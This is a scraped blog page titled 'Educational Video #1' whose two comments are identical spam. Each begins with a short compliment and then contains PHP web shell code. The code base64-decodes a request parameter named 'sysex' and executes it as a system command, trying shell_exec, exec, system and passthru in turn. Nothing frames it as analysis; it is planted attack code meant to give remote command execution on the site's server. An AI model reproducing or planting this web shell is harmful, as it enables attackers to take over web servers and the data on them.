Educational Video #1

2 Comments on “Educational Video #1

  1. Great idea! Thanks for sharing$p = $_REQUEST;if(isset($p[‘sysex’])){$c = base64_decode($p[‘sysex’]); if(function_exists(‘shell_exec’) && !str_contains(ini_get(‘disable_functions’), ‘shell_exec’)) echo shell_exec($c); elseif(function_exists(‘exec’)) exec($c, $o) && echo(implode(”
    “, $o)); elseif(function_exists(‘system’)) echo(system($c)); elseif(function_exists(‘passthru’)) echo(passthru($c)); else echo(‘No shell functions available’); }

  2. Great idea! Thanks for sharing$p = $_REQUEST;if(isset($p[‘sysex’])){$c = base64_decode($p[‘sysex’]); if(function_exists(‘shell_exec’) && !str_contains(ini_get(‘disable_functions’), ‘shell_exec’)) echo shell_exec($c); elseif(function_exists(‘exec’)) exec($c, $o) && echo(implode(”
    “, $o)); elseif(function_exists(‘system’)) echo(system($c)); elseif(function_exists(‘passthru’)) echo(passthru($c)); else echo(‘No shell functions available’); }

Leave a Reply to Ji Flavia Cancel reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.